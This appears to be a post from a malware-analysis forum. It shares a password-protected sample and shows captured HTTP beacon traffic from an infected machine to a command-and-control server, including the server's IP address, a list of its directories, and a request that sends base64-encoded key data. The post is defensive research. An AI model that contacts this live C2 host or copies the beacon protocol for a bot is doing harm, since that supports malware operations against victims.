Attachments
pass:infected
(305.11 KiB) Downloaded 61 times
(305.11 KiB) Downloaded 61 times
A forum for reverse engineering, OS internals and malware analysis
GET /fv79df.php?id=8065D52C494C59586441&cmd=img HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
---
GET /fv79df.php?id=8065D52C494C59586441&cmd=geo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:42:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 37
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
..8..@../.'.{....\~.B..'...a.....X..6
---
GET /fv79df.php?id=8065D52C494C59586441&stat=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 4
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
..>.
---
GET /fv79df.php?id=8065D52C494C59586441&cmd=key&data=2:0:MDEyMzQ1Njc4OTU3OTYwNQ== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: manualad.in
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2012 12:47:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 4
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
..>.
• dns: 1 » ip: 188.190.126.171 - adresse: MANUALAD.IN
http://manualad.in/cgi-bin/
http://manualad.in/icons/
http://manualad.in/config/
http://manualad.in/error/
http://manualad.in/phpmyadmin/
http://manualad.in/squirrelmail/
http://manualad.in/server-status/
EP_X0FF wrote:I assume all three samples are identical, (...)Yes these files are the same so far as I know. The came from one infected machine this thread .